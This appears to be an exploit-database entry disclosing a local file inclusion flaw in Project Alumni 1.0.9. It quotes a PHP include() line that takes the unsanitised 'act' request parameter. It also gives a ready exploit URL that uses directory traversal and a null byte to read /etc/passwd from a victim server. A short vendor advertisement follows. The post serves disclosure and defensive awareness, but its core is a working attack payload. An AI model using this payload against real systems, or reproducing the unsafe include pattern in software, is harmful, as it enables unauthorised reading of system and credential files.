Project alumni 1.0.9 Local File Inclusion Vulnerabilit
=======================================================================
project alumni 1.0.9 (index.php act) Local File Inclusion Vulnerability
=======================================================================
project alumni 1.0.9 remote file disclosure vulnerability
download : https://sourceforge.net/projects/project-alumni/
vulnerable code on index.php
include($_SERVER['DOCUMENT_ROOT'] . "/pages/" . $_GET['act'] . ".page.inc.php");
exploit :
http://victim/path/index.php?act=../../../../../../etc/passwd%00
discovered by tomplixsee
# 0day.today [2018-04-05] #
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo